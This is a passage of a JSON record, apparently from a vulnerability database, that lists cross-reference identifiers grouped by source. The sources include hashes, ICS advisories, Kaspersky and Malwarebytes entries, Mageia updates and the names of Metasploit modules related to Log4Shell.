"7566B2B0BD8AE66EDD74AA6296BA3C094CC3661C2B4C3EADB69127C0EBE5A710", "76FC3815A1052A74CFCD99C9C0F5C1F4FA7C289E70171A7BA16DE2B8E6DA736B", "77486B8B5BB16D0AE922BE517509C1AEDA2019428A2A23BADFAE5682D363F74A", "77C0F01606E7883D65A2981E1E5DAEA1712E790E6D5528DDD17691C666E43D15", "78230A0FDE17E1A4791590999547D790CF1340A3123CA146452B6C92AF70CA24", "78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533", "7A1D4AFC62D444E93951F6A46CA35876DD42680BFCB9DD562AE0F80A2C338D67", "7A36E54AFF586A013BFC64E0308098C6070D7FE82FD631B59758E4F661D42586", "7AA351B847C7732E8B7AE01A83A77CC863325C3B53A57FDDE54F4DF8D16D14C1", "7B60DE546B91D3886C995A5DE16291DEDDA95C96FC984BD69B852CF111B4C102", "7CCDD8E65FBE1F2581D0942E2116E4E61FB4753B4D48798C9D2BC8624C94826A", "7CE0B3947D8196985B00E6EB61ED45938560312360058DDC3063CF3D7BE03A81", "7CFF760ED43EACB85DD304FEF6EEAD9D89C48ADE6361641E84EF811056B6811F", "7D3ECDDF0FEF31AB10959BE94A3F76C4BE4F6CA1CC52373D0E460C5CA46E24A8", "7DDD006076946810EADC174FC2320565F527D46FFF5270A3D6916BF8993B12F9", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E14B22ECA169752ECE98AF6029993D38DAD48CA63B7F7A2541E649258A2178A", "7E2A7C8E981FCA78A12F6D8992BE35354D42B960D223A90BF210EE5B300BFB9E", "7E4FF868DFA0F4BDAEDFDEB60188A16AB82AC45AB8EB35F1D260229F12C10341", "7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B", "800A58A21DE4F630ECEAAA1932A596AE5A4743CB06907F342619D1D7ACD5AB64", "801604295C016952DB2E8049DC0524C86569A636C5BC867E0FB7565B433600F8", "818495FB1C54B71E6C7753464B1C7C2926402C76844055039753A11157B24B81", "8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E", "822A5D5DDFBAB14222D402C61CEAC1259D980506DB6102BD80EB619551AE1961", "83188B7337A79BED2EE122E55D4C81A473739295B1921C9346E1F37B317DCD40", "837053881E5EA3C6EA980180D7C7511FA7016F0506D6270160A596789757E6E7", "838686EA8660AF45865AC08A8AAF01B25ECE89F900D760F085C235BD477978AE", "84B9F968C99F1D06D139A9613E0943A5C824556A856DEFE8DEE64E68329DDB5C", "86B15422FEE58FE9F2F1B22520453D09FFA84C6049446DCE8467C766E3B57967", "870093D07F2D1BC6903F68758BFC9ABE9984CCE5FE2C013D13AC7FB645217C4D", "88119FF28113E384895FADEA63C7ABC2906571B02A874CF9D50260071AD58FB7", "887B058F572F29D81FDE73F26FFA89AE94C5B73C248CDC8EB74C172F09B39B6D", "889513D802A76507558C54C040010996613C8881A261DD9C7C561CA24A30140B", "89170AA222353F9A48D8A118FE03328E07C65970B2FBD60979FC33A65AECC8CB", "893374FE903D82E10726F93A8E126C72248B18315149992024525319951E3097", "8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8", "89E699B806727E33E450302956E4D536B906A5F4CF0C0791EBBC25F005461B6D", "8A20ED34CC4EABFD78A0599C47EC735B1923D5C4CE1DF595D753961732461EA4", "8A368F9B7240AEC7A45518B26EE613BFEF287DD9E106138A5AD63F4D494034D6", "8A9E980FE740F4424FB663C857EE84E39154A02964A02540A3A74E4A80F058EE", "8B18A583802DE934D0ABAD4E3B44AE36DEAE634549737EEE9B825D44B47BD7DA", "8B1D9C3BB3CE6364BD0FE7732D06F394D6218ADAB37D1876856BEEE8923DFA4A", "8B49BD8B4756373645F1A1DA4BC3E31D1FE7BF1F5A0706A9665EE61D5A4B1419", "8C8A687167096A3D2AA73F94AC7D6F1C43EF830C110ED1F9406D92FAD9FCBA59", "8D4EDC587A369AADC2A4B4B6CA60C94602327216807E8B71042463A2BF381325", "8E3EC3A49910FD61ADB4E5FDC225B58A74D0BA57105F3D9A6F1B3E46361C1307", "8E5EB05CFB883D682B3A2C7D645375420476C4616183B915FE43ADDF8FA697A1", "8F6A844E65558AF61A350206417B63BD70D5B529641691C495C07407B13441B7", "8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4", "9052D87C0A77FDE9339BE13D5F9E4733073147348EB17E7CF0F5B741C451ECC3", "90B290F66451E3E462C09788B6756181F62A92A8BAA10F2C4BD52977FD8E1B37", "90BE58D9524F7F6A98C3EE79C93A2EE6A0EA2C0D7E33DC628128C7D1BCFA8619", "924D425FFD71097B50917C124D87FAE558BFB3C7DAEF1BEA09CE12CCD6B264B3", "92A25ACC7CA97D427DA5F098FEAD958217F50C6C07BA13888E0C08A046DD5DA3", "92C22BB80F005566A9B6BC13CEB85433025D25B49B4109FF79DFC90B8A2B7A4A", "932EB6FF0C79CFA010373B06A99AA8906C2B3B3171A0D96A0399EF72EC35ED11", "942A563AC62B9ED7ADC9AAA1A75FE9F97DA036B632DE9ECD7DC3CC1E19EC9A60", "94633A31471B22DF4D1E9508BA6DE360B6D37FAD329018F21926F838DAF45AB4", "96004A5F0BCA499E57604F5222E28642F8BB3CC611C03BA8BD6830BAF6767297", "964A048B00AF3D409A4AA83094E36431FA7631859A2D4595D2F53EE838A705E3", "965AA3643F2C2723C5C9B471B69786B972B6D81B6C917B50EE5BFD6C8447279C", "976356D0F193356D662AC659E8578D3D0CC6C5711EA8A61D28A63CCA919F9900", "980930D95C9061C71E85C435692629E07D952BA870609E55949143F9AA635712", "990B694F8FEB56054D99331B4B4370CE96BC2A4FD7C4E2B75B5E537A91E83D24", "998E998A37AA40076F35ACE20C7E0016E44B1CC4EFB6AE26D0761C68B7C99657", "99D36C5A3B6C3FF496422C3FF600B7D254E5D81D1CC0F9184ECD1F8F03423FCD", "9A1FFC27915FCEB638A5FB6C3316111A4211363FE0EC89A0019FA42A7CB89808", "9A6C0D3F4E9D02D3ABB77CC1F15B5C57FED8926916549AF207B111EC9D3C5B1C", "9B0F66C4EFFAAF9FDB1B504C2B624740D85D778570BFE202D803740E0C99076C", "9BBA472DF522BDB11A0F80EDDE168630BF88A9C15518FEE66140BBEE5585001A", "9BFFF73DB09075877DB19A13994A90F7D1CF13A8A5601B84DC0B84F8193E65C1", "9C638946C07968147BC89DE8BAE5211C4767A334F7213E99654F7C02ADD0E910", "9CF440D80F7C3ADDF67027FEB0B656E02CC2277FA267330BADF00CF32A1D4BEF", "9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A", "9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8", "9DA9D6C05FE03758B84DC068193CB0E2A82B2F411E24F383722448967D77B355", "9DC92E76D921D2F32AF89C6A9268FA55FE90987B5125CC3C9BFF3634818FDD1F", "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "9F34E4D3B1044507E18917B1E2BE1AF6051A228EE5F8F69E5539B48FDFAF3B4D", "9FD1AC6E7F93ABD6198F576C4AC025E8DFA5007533DBD2FE78CC5BE3497FF3D6", "A060C0BC5CF92D0F7B8D81075A33D4E2887EE843B41F417A28EC2BBAB72FCED9", "A15B390D080295157749FA22EBE90BAA7A33E1EC803752A1824ADBE8D7353A10", "A1610C4151E05207C2B70F00002FE2069C48E736E5F65C67864C8C78D8372D2B", "A1680316198638EA55AFA837EE37AE44184E9B8BCA2B9FD668F06E417908DF87", "A1D2EE183CE8C9693B1DCADBA6A6AC4E58CAAD746DE6081E211B0D2080D3C3E4", "A2133DCF0D67EC30E5F3D15E39561490E1B16A2750CD5C806DC8F9E95825E247", "A22A62D71C3EEC00971E326ED7FCCDE4C2959771727429F852D98592C456C126", "A264D72AF012C33CABCDEE09605EBB277263FB33567A89DC0831C44257A7E37C", "A2F7E57DAD21E2D5E4DB804EB652C6CD00E5CDF5B0D67125B95F4E269BA69025", "A31AAAB46398C4CA9F3552FA53EB3F0DB8FD1384559E2048B5321E5BB6936FB2", "A326E188CED4EABC01874E1D337797D5BC22F3ADB5FAF12692F46CA9F4CEEEA1", "A339910401C1CBEBCD02CB63650E2A2F954071F79CBC8E8EA704AFBB756CF438", "A3AEABE024AE1D8520A5BB495A67D45783D1F2AC4B3F9F3B682E75291FD8E20A", "A3BC60725F0EAC71F9F85D52468B5D776A02B53D2F6CC6F5075461F1867C9EA8", "A44F3C58E434BA15FF852853D94A3A21A868AF86E9655A8594367CADBE40A491", "A4DED06E2C9F4A28ADEF0AA4C6EEFDDF9D1F431EA3CF997F41E7EA22CA7B12B7", "A5803C821BBFCE3CF61C99A5753B13549E824EAC069265D225FFBDF6B568BCDB", "A61564D752A2637A5306DF51328148AB1D1EAAC0735226DD1D9F500C5DAECC37", "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "A6B79EA77FF12E690D40F605757B18FA9561F56797862582866D9A26B345F82D", "A7C08E9177A10AC583EA198F89BF0B091ED0697BF42F39DC0B151F7465C9BAF3", "A8080DF589F1BFC2BF6B98ABD8B92D2C07AAE6F3E14977386069111BB800A09C", "A8769BC2B0DB66C792D9EFA7CBEF5668B22FB52A475E194FEB169B3B4BC31FD6", "A9139EA8D202B9FE20D64E771F1FC89C7E9393774315A6265F9CE70E716E1833", "A986F0D7B51C204D69DD897A085F9CB249B65DF7C839AF92D49287ACDEBDA05D", "A9B63F0DBA193CFFCFE78E0BFADD5C8ADA02B92500E16CBF9385EE4AB5A92A9F", "AA3BDAF8E33B6E3ED2F924A99C734FE82BC738F506CB900388E32E3FD4CCDA88", "AAB14D78054A85A0638FC4EFD7F09686429CB02C6B45FF1ECAFA55C27A050635", "AB8881439FA512D752063B5AB323E9C076039DB482070536304B448AE092D8CD", "ABBECC2CF1F809CE932B9130A6788B28E3F6228FC5599EA3FB4CD8372D7EA7C8", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "AC579EF06A63C7679B2D7EC4B67819D5F33EC90E9760AA522990209580D45436", "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "AD5C7F7150FBD846C587F5FAD0D7C7B48F81990F52A351F824E5CBBBAC83F163", "AE2FA11123F866B1C71B66A57712F1082B82D3EB4221232EC14E14446822A705", "AE98DBCCCCED8FE9C2F0A9A3294999AEF099215A25C0EDDDFD95DF899965A340", "AF14D81F9945B81EA39B6923FB2CB4E62949A34EE9CCFEF7120D6D6700FA48A1", "AF42048553DF8336CE8F75C6563D3BB870B0BFCC07DC4C6744F964C990F06384", "AFF479D95FDAD4900AA4F096E105276FA32246E4CF2C4642D2BFEACB19522885", "AFFC971A929ABC4A5177F4FBA7D32B82C0ACBC71AEFBBD3E440D08B12B022B51", "B0A8BF7D544954AF5D193262AAD0DEAC7961A5AAEEC3623B441BB795753711B6", "B1EA708CCF72B8264EA46A7D99E1616E7334C67D440D87A4F97B2B4087696EFD", "B30C006BF323BCAF8E8EF0489319D47B3A0FB0928442F9EB350A3520109F9F72", "B39F7DFF040AEE7948452F4B23B147EBA3BC088DA5624E4E7B049C051EB56B60", "B431011ABF67E8DD4F4E3E4C9F9FD0B1E6E07733191BA7206314070644F2CAF0", "B4779B52313D85FE1157604480F675A0E2BA765BB08DE9BEA2664A6C3AD0F47B", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B5D3987D37FA57ECB44634029606786ADADCB0901EF9858232A7D33908EC5FD2", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B73437073599A5973472D300EA14AD94DB00FCC9790D93795D0BCA840608CBF4", "B735C91C5D46BD88FD491D67AB17706F0B9FDF9D50797EB4994A198C09D7FD04", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BA4F5153F7218CA2919C447302324B583F37CF0D794B41E34C5B63CF577C6462", "BAFF6760E68C0F676AFA3DA20E18B06BD703574BC65B9BFDBCD22ACCE05F7FEB", "BB76D9518CCBAE68500AB2DACF1AAAF9F5532441FD3A705A4E4A39114EEBDC0C", "BB785F5F4B456D5F3322E9222022F0E38411602612EBF72BC61AEEABF7FEC2A9", "BB96DF8C4863ECA5111B83DE1E5DBA4C67AC8E6999013404D8DD87C98CC7B60D", "BBA20026A90E4F85555F0C8BD6248AE07F7DE01D687CD62F0159CF4B22E7DA25", "BBB0C0E9DDF621A6AE6C42CB1DFF2B33670CE69032E5482B47DC24C860F78C9A", "BC3A1086428BA3DB72FFD49EA27AAB3A8A9FA0DD5D576D47E0467AE96C365754", "BD8AEC08AE2FA3C7B6CDD03A046DE8D2D846B9AC7A7C2948B791173D0622B3A4", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "BFA9A84596ADAC3A47B31C43DD8574B1E532311E1F9B01F003F6AEFDDA4BAACF", "BFA9E5B9CD204137C5C40A62AFA0C09607B8FABF6ADAD16BDE69778F6E3530F1", "C04EDE0E9159DC9AE235755A284662F042D80745649864CE91E7E3E4563221F6", "C0CE38B8081A59A18598B204BF933579D5A04D57C0E8BBBEC053AC1350A2938C", "C1BEC46524F176FAE4CBB603AC283FC9F12029FC3579BBDE20A1B80FA597B0FC", "C2D7FDE6929D1789B9A1618D087E5DCB3FC2780B2EC1CA3CFF40FDF3AD014A8E", "C3A579D5583598BF4F36F66A731C39A1C3E23351DFAFC16956E2C8DAB030AEBF", "C4B2A7F25639B468CB0778EA1E561F435356D460FB4D417EEBDD1C83186B56CD", "C717E3C358B1EA0AC9E1701DBA722015744796BC3CBA66E7AD79D30CEB45BD60", "C741AA98787A9F837D93EA7D1268C62A551244CB826F0BEFDB076F796F78AB33", "C786E96DD673C5766A45B6750BE6B879F3CF37718ACD79668ADC1130AF26E274", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "C810746DF12642CDB3444A565C3CE3ABFEFAE31EFE9FE6BC4718CE76334BEB88", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CA643463AA3DD27CF347651D7B084BEA39601B3E21A99AD0FE90A4163037F126", "CB1A96B060B639265D7CCD4E0C186EA367A7C82E1756FDF32E57D9F350AD3873", "CBB6711004455A0722EAF33EA7E16444AE4DF08D1F9C341B64251DB448ACCBB4", "CCE74B609685420B52F0CE6D14ACF26F43DB5C6A64A19034DCD1E9CB0CA2BE72", "CCF869217B83C7570F586028248E128FA170E16792CBF3BAD70423425B1BD638", "CD617F98180D24BACD7FAE3B791B49B329F7F25DC885A6AD81CD6A815194B6BA", "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "CDC93F5A32848FF0073C48EDC66593F2A0A2AACCAE9802E843826C6E565AE2E9", "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "CE291DB15FB1A7FDE49870DEF70725290D757902B5EB4009CD8DC9710150329D", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "CF56D9AEC134D68DA67A2476D2B87833F63F32777672C1C66A8D8FF69C08623B", "CFDD5A9C7B8C9F6AFEAF6B1C68FF8C11BEADF52EE2E731CBCD194CACB1898BD6", "D0F2649F94806F3BD8B6996A413257C3454A5FF5033B50B88A71C9C124BF3BDA", "D156BD5A77A183961676EA2393F58C31A72725CEC216EB199E31487998BE491C", "D1B56895A302CB106810B80548010A8993C467A6D8B6EA61EB430703400A5ED8", "D28370F3789940A6A2F0B48D0BB882F7E298E5B8C7167BC16F9FB06B92DBCF35", "D406490E70A52CFB0315F27FCD957BFAE7E7B2887A6C73BE83E3F514F1153348", "D4AC8637482E0D53AE579FBD19E568DF643A9D732D1995CBEF53FC6B867F82DA", "D6A22AE665DEADE235C2738407D64638A424C6CC505B816BFEA12DEFCC5CD645", "D728283BFB4D0C3BC5C98FA880696DFC59C2A5FA652666E966D126A6D7FC92FA", "D78F8119FF4EBAA3EA6E8A906FCEFE0DB24B626AB87F3DFEBFA899904F726130", "D792D660667D934B582774E627CB3E2E010E497C8C1D9F4B7C138E4B5DC2ECEC", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "D9425756DF631BB7CA03B3451BD1F9C557325B8A2BB0CD34A22102962A0F4213", "D9D2F8F1F4727F09E77272D6C8643C3016BCD6A8E4BC6E59B27B37256F4F8F76", "D9D956C60F66CFAE1D9189841B4A3D7D9E24B0A79B088C79120CBB100E34A220", "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "DD0EE895B8C1D023C4A9C7DA2726D4CAC8D1495A05DF9FE91915F58FF012245D", "DE8C5DCB7F07498942725CF8F7905DBA001C7B89D3D36370CC303A274CB9A8EB", "DEAB63B690E03D8E8203ACA19836C2D36A8ED9D5C66A32CCF4F7F6B6C9F8DE84", "DF1F3615A0C3950BF1BCF7F7E12370C0F3A7DBD2E12D656DC66F966233BD6A40", "DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "E036688C47591ADE56001D0CD1013191D6F43940CA2DB9509F5FCF0F2469F92A", "E0F75591E2E6874A35B6A6C7681543B81128F5226E803A2CCE1D1B664BFC8638", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E2AA9B11D88890FE4ED3C245CC3A519ACAAD11F11F032D2AE032FE428B8C4012", "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "E3C82809E8425A65E53029135451CC9579AA725E2D85009F892DD0A0FD979ED9", "E3F560319C0EA06228FA2D0D5412CFFD95B8D0963A65CBAC4B6D424BA4B7B434", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E4DC5C75AB8DC1EFE3474E65C33B8EED76C2B358258DE3E2C7A0C0EA9FD53126", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E805A2E822F9F587AC809C6A8CA399694FA0BD883078F64EF001D4B79132B879", "E8302DECE1CECF16A05E7F8FBA08D33074F30279F18CDDBABA912B9C9DF9F32D", "E84CA6147175A22CB9253587142088EB24B6AE0BD11EC07E71E299F57DD05739", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "E8BA6A75873A4594BE92FFE48C361848E9581DAA153EABDC1D071E1A59172338", "EA3F9619545419A098A554C6AA49233D406E118A8A2221EEFF0BABB483AAC02B", "EA69F3ACF81616FFD52E1EC0A74B074CC736B3675D7B61644018A9252D9BD284", "EACE8EC2B7164C19E5BA497C1D57887C847EC033403098801408B0F6BB2B6736", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "ED7164C07048A48E59D18BAADA456D0655A81F29CABBDEFA06735647C2B759EA", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EDA30B3C2FB2766DFAA280B3B5E960EC660172EBFF7B73A524DCE514A3A3F985", "EE31BACFE4E2531B3AC2273027A23C49C59978284694658A79B4BC6797F86ACB", "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "EF71291A92B5250A0A03CC8B24766E487991713BE06BEFF3A0428155C170ECB7", "EFA06779A2DA162F7F70171BAC9D53E998DA486C75081458549AFE875DB6E5B5", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "F02EA1DD204629897DA1861F147A272B72A3FA34A5315D58B896A636EAE341F5", "F0806D2A2F2817DD3A11695DB658C0C7C64B134E8875822DCE8F5D73AC04E97B", "F16DAE77B5D6C7D782818596F851DFFB29226C0550922519EFC4250E27D09D67", "F18F021F8259C21D1B03D3A3C3F5FD97D6A165E424FE86F9986F545F5A914F8E", "F203AF8FB4A9FED8F009C8BF5E3F7D7714130DCBC84CDBF1BE1C83E438B18982", "F20E63C2D2D2AA05D977555688CD3131DF08DA240FDFCEB0B017DF8A789BCCEE", "F2719E2760E07B98F3971587EEE2002655F8B8F5281074DED92EF416C43F19C8", "F2901ADEFFDC496A6F27CBD82624C55C4B805D9C77EBED14A24ED2CCC730C354", "F2C60EF9E96AA9B7F20810A32ABE6C58279506718A61C2BD9D6A6DF787CD9EA7", "F35EB0C55F08CA4C671A4E6D2454A08936C6D1CD868709D0EE04FB71FFC263C1", "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "F435C74BF942E3B3A5FEF2B742E716E29826D42678DE6AB053B1766FC7314452", "F532C527613357C6A2A49FB79425351FAA7200585028A4FA9898C13802895FB6", "F7232359E6413A274B62C22CB7BF1EF8C428ADFBF22EF7B9B913D63D087BCACB", "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "F8F03C35A3C8AEA5027E6C01D991D7E1C3A4A0C9EAE0D875ACF760D1D56B8B9C", "F9CD245944BE763583F94B01BC23C08D6F82CA4989F000C1D0842D4005C4EF11", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FB294BF49176D6C142EF1CFE519D56E0B6967174C95D88BDD800F026AD0FBE3B", "FBA658AB7258D6E577137D42B1A2D234254671E3792A2242E92F22B44483BD23", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FCA762BB9E14A08E1A746C9884B2B094D081A955F4AED9FE69DA524978C45CE9", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", "FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["ICSA-21-357-02", "ICSA-22-034-01", "ICSMA-18-058-02"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C", "IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "kaspersky", "idList": ["KLA10995", "KLA11024", "KLA11059", "KLA11139", "KLA11170", "KLA11835", "KLA12277", "KLA12278", "KLA12390", "KLA12391", "KLA12392", "KLA12393", "KLA12394", "KLA12395", "KLA12396", "KLA12442", "KLA12549", "KLA12550", "KLA12578", "KLA12579", "KLA12580", "KLA12581", "KLA12587", "KLA12601", "KLA12602", "KLA12603", "KLA15734", "KLA15736", "KLA19245", "KLA19249", "KLA19264"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1624142243530526923", "KITPLOIT:1680589374755422772", "KITPLOIT:2590785192528609562", "KITPLOIT:3188944951765917430", "KITPLOIT:3456474172768099634", "KITPLOIT:3697667464193804316", "KITPLOIT:3773942873037113539", "KITPLOIT:4033244480100620751", "KITPLOIT:4074521293617632933", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4462385753504235463", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:5187040326820919368", "KITPLOIT:522409803487164759", "KITPLOIT:5230148353750207837", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:698315176468431184", "KITPLOIT:7847586937102427883", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:866017936175971203", "KITPLOIT:8945091038325456871", "KITPLOIT:942518396640901655"]}, {"type": "krebs", "idList": ["KREBS:2752861A306F74170D69FBD9E0DC3AAB", "KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:409088FC2DFC219B74043104C2B672CC", "KREBS:4D5B2D5FA1A6E077B46D7F3051319E72", "KREBS:4F19DF7091060B198B092ABE2F7E1AA8", "KREBS:6E25B247DFBFC9267C00F36CE0695768", "KREBS:93C313996DC56B0E237DCF999BF438CB", "KREBS:E877FCDD28FB558BB4B6AFF240F30EA8", "KREBS:E910A9996E07E6C63E0C32D6520D0F25"]}, {"type": "mageia", "idList": ["MGASA-2021-0556", "MGASA-2021-0566", "MGASA-2021-0572", "MGASA-2022-0002", "MGASA-2022-0277", "MGASA-2022-0287", "MGASA-2022-0309", "MGASA-2022-0315", "MGASA-2022-0318"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0647495F01C9F1847B118A9E32BC6C13", "MALWAREBYTES:08FDD3DEF41B63F1DEB23C21DCFDB12D", "MALWAREBYTES:16440CAA6CF5418D984950D297C8549D", "MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:1E762A45A948B3FD9F8A8DC65D028095", "MALWAREBYTES:2D17A77CBCBBFFE150012C3B71E53FC6", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:3350250AEB75AAF452630CE0B7306455", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:4690DE85CA58136434BF7E127237802F", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:69B09CC9DBBA58546698D97B0C4BAAF0", "MALWAREBYTES:6AC81D4001C847401760BE111E21585B", "MALWAREBYTES:6E72426C60EECBEF071E305072060892", "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:775442060A0795887FAB657C06773723", "MALWAREBYTES:7D6B4BABB8063861BF6305FDC03DBE1C", "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "MALWAREBYTES:8FF6ADCDE71AD78C1537280203BB4A22", "MALWAREBYTES:90BD6A9BB937B6617FDC4FE73A86B38A", "MALWAREBYTES:96F58422910DF7040786EDB21736E547", "MALWAREBYTES:9E683A8CBB0F4ADB76A7183C47833E13", "MALWAREBYTES:A165959E3A462AF8315F01F1020BBF53", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:A92CA3CF06DBCD086A388A462B770E3B", "MALWAREBYTES:B24AD5C8381AD8F711BC02246606B36A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:C0A087A65BF94128AA1574F7D45E306B", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "MALWAREBYTES:DDF3883C3A8B9A70629872FE83522C17", "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "MALWAREBYTES:F40C2861F5D3CFF011E96C0D46C51A46", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-LINUX-HTTP-MOBILEIRON_CORE_LOG4SHELL-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_MS17_11882-", 